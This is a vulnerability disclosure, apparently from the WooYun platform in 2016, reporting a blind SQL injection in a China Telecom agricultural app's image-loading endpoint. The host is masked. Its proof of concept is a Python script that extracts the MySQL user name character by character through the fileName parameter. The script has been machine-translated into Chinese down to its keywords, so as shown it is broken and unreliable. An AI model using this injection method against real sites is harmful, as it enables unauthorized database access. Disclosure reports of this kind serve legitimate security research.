漏洞标题 中国电信农技宝某处SQL注入一枚 相关厂商 中国电信 漏洞作者 darkyantou 提交时间 2016-04-23 12:50 公开时间 2016-06-11 10:20 漏洞类型 SQL…
漏洞标题
中国电信农业科技宝藏SQL注入之一
相关制造商
中国电信
漏洞作者
Darkyantou
提交时间
2016-04-23 12: 50
公共时间
2016-06-11 10: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
10
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
Sql注入
漏洞详细信息
中国电信农业科技宝盲人之一
http://**。**。**。**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg
漏洞证明:
中国电信农业科技宝盲人之一

附在脚本上:
#编码=UTF-8
导入请求
进口时间
导入字符串
导入系统
随机导入
标题={'内容类型':'应用程序/x-www-form-urlencoded'}
Payloads='abcdefghijklmnopqrstuvwxyz0123456789 @ _。'
打印'开始重新启动MySQL用户:'
用户=''
对于范围(1,28):中的i
对于有效负载:中的有效负载
试试:
s='和mid(user(),%s,1)='%s'%(i,有效负载)
Url='http://**。**。**。**/uploadFile/loadFeatureImgDataByFileName.do?fileName=d12da195-4e90-486d-ba9e-be00e7383263_20160325022009209.jpg''+ s
r=requests.get(url,timeout=5)
如果'Photoshop'在r.content:中
打印有效负载
用户=用户+有效负载
除了:
通过
打印'[完成] MySQL用户是%s'%用户
修理计划:
过滤你知道
版权声明:请注明来源darkyantou @乌云